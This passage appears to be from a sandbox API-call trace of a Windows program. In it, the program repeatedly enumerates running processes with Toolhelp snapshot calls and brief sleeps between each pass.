szExeFile="ONENOTEM.EXE")) returned 1 [0215.219] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.219] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.219] Process32NextW (in: hSnapshot=0x168, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.220] Sleep (dwMilliseconds=0x64) [0215.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16c [0215.378] Process32FirstW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.378] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.379] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.379] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.379] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.380] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.380] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.380] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.381] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.381] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.381] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.382] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.382] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.382] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.383] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.383] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.383] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.384] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.384] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.384] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.384] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.385] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.385] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.385] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.386] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.386] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.386] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.387] Process32NextW (in: hSnapshot=0x16c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.387] Sleep (dwMilliseconds=0x64) [0215.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0215.487] Process32FirstW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.487] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.487] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.488] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.488] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.488] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.489] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.489] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.489] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.489] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.490] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.490] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.490] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.491] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.491] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.491] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.492] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.492] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.492] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.493] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.493] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.493] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.494] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.494] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.494] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.495] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.495] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.495] Process32NextW (in: hSnapshot=0x170, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.496] Sleep (dwMilliseconds=0x64) [0215.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x174 [0215.618] Process32FirstW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.619] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.619] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.619] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.620] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.620] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.620] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.621] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.621] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.621] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.621] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.622] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.622] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.622] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.623] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.623] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.623] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.624] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.624] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.624] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.625] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.625] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.625] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 